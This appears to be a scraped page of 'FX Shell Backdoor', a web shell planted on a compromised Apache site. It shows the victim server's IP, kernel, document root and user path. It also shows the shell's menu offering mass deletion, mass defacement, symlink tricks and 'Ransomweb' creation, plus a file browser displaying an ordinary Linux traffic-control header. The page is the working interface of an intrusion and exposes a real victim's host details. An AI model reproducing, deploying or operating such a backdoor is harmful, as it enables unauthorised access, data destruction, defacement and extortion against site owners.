FX Shell Backdoor
Home
Tools
Mass Delete
Mass Deface
Symlink
About
Website : vivehg.com
Ip Address : 172.31.2.149
Port : 443
Kernel : Linux 52-72-122-155.cprapid.com 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
Protokol : HTTP/1.1
Save Data :
Koneksi :
Server : Apache
Root : /home/vivehg/public_html
G-Interface : CGI/1.1
R-Method : GET
Browser : Lainnya
Version Shell : 1.0 (Release candidate)
Author : FierzaXploit/Mr.MF33
Type
Name
options
PATH :
/
usr
/
include
/
linux
/
tc_act
/
Upload
Buat File
Buat Folder
Buat Ransomweb
/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ #ifndef __LINUX_TC_MIR_H #define __LINUX_TC_MIR_H #include <linux/types.h> #include <linux/pkt_cls.h> #define TCA_EGRESS_REDIR 1 /* packet redirect to EGRESS*/ #define TCA_EGRESS_MIRROR 2 /* mirror packet to EGRESS */ #define TCA_INGRESS_REDIR 3 /* packet redirect to INGRESS*/ #define TCA_INGRESS_MIRROR 4 /* mirror packet to INGRESS */ struct tc_mirred { tc_gen; int eaction; /* one of IN/EGRESS_MIRROR/REDIR */ __u32 ifindex; /* ifindex of egress port */ }; enum { TCA_MIRRED_UNSPEC, TCA_MIRRED_TM, TCA_MIRRED_PARMS, TCA_MIRRED_PAD, __TCA_MIRRED_MAX }; #define TCA_MIRRED_MAX (__TCA_MIRRED_MAX - 1) #endif
tc_bpf.h
Choose...
Edit
Rename
Delete
Now
tc_connmark.h
Choose...
Edit
Rename
Delete
Now
tc_csum.h
Choose...
Edit
Rename
Delete
Now
tc_ct.h
Choose...
Edit
Rename
Delete
Now
tc_ctinfo.h
Choose...
Edit
Rename
Delete
Now
tc_defact.h
Choose...
Edit
Rename
Delete
Now
tc_gact.h
Choose...
Edit
Rename
Delete
Now
tc_ife.h
Choose...
Edit
Rename
Delete
Now
tc_ipt.h
Choose...
Edit
Rename
Delete
Now
tc_mirred.h
Choose...
Edit
Rename
Delete
Now
tc_mpls.h
Choose...
Edit
Rename
Delete
Now
tc_nat.h
Choose...
Edit
Rename
Delete
Now
tc_pedit.h
Choose...
Edit
Rename
Delete
Now
tc_sample.h
Choose...
Edit
Rename
Delete
Now
tc_skbedit.h
Choose...
Edit
Rename
Delete
Now
tc_skbmod.h
Choose...
Edit
Rename
Delete
Now
tc_tunnel_key.h
Choose...
Edit
Rename
Delete
Now
tc_vlan.h
Choose...
Edit
Rename
Delete
Now